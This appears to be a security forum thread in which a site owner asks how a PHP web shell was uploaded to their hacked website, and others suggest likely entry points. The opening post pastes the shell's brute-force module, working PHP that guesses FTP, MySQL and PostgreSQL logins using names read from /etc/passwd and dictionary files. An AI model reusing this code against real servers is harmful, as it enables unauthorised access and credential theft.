olimits7 wrote:Hi,
My website was hacked using the following 404.php shell file, which I found uploaded to my site. I checked my logs and I can see that the point of entry was through http and not ftp or ssh.
http://pastebin.com/pXACCsW4
I'm new to this whole area, and I'm just trying to learn more about it and also how to protect myself better.
I see in the http log file there are a bunch of "GET" lines, but then all of suddend I can see a "POST" line show up showing the upload of the 404.php file. I'm trying to find out how exactly was this hacker able to post this file to my site.
The only entry points I can think of is I have Kayako Live Chat on my website; could this file be injected through this Live Chat feature? Or I also have a WordPress blog on my site; could this file been injected via posting comments or trackbacks on the blog?
Thank you!
function actionBruteforce() {
printHeader();
if( isset($_POST['proto']) ) {
echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
if( $_POST['proto'] == 'ftp' ) {
function bruteForce($ip,$port,$login,$pass) {
$fp = @ftp_connect($ip, $port?$port:21);
if(!$fp) return false;
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif( $_POST['proto'] == 'mysql' ) {
function bruteForce($ip,$port,$login,$pass) {
$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
@mysql_close($res);
return $res;
}
} elseif( $_POST['proto'] == 'pgsql' ) {
function bruteForce($ip,$port,$login,$pass) {
$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
$res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if( is_array($temp) )
foreach($temp as $line) {
$line = explode(":", $line);
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
$success++;
echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
}
if(@$_POST['reverse']) {
$tmp = "";
for($i=strlen($line[0])-1; $i>=0; --$i)
$tmp .= $line[0][$i];
++$attempts;
if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
$success++;
echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
}
}
}
} elseif($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if( is_array($temp) )
foreach($temp as $line) {
$line = trim($line);
++$attempts;
if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
$success++;
echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
}
}
}
echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
}
echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
.'<span>Server:port</span></td>'
.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
.'<tr><td><span>Brute type</span></td>'
.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
.'<td><input type=text name=login value="komsen"></td></tr>'
.'<tr><td><span>Dictionary</span></td>'
.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
echo '</div><br>';
printFooter();
}
LoGiCaL__ wrote:I think you would be better off posting the log. Just take out ip addresses or any identifying info.
olimits7 wrote:How exactly does a brute-force attack work, where by using "GET" they are able to upload the 404.php file to my site?
olimits7 wrote:Could this be done through Kayako Live Chat or through Wordpress comments/trackback links?
Thank you, again!
centip3de wrote:No. This can only be done through something that accepts a user/pass combination, such as a login. And, because he was able to get something onto your server, I'm assuming that it was the login to your server (also most likely why there are port scanning functions in the script).
weekend hacker wrote:Although Wordpress makes it easy to update there could be some vuln plugin or some other web angle that wouldn't require a password.
And with shared hosting it you could have set bad modes on your directories allowing anyone else with an account to write to it.(really though, what kind of hosting doesn't at least pretend to prevent this?) There are so many potential ways to get in its nearly impossible to tell without those logs and more information.
Users browsing this forum: No registered users and 0 guests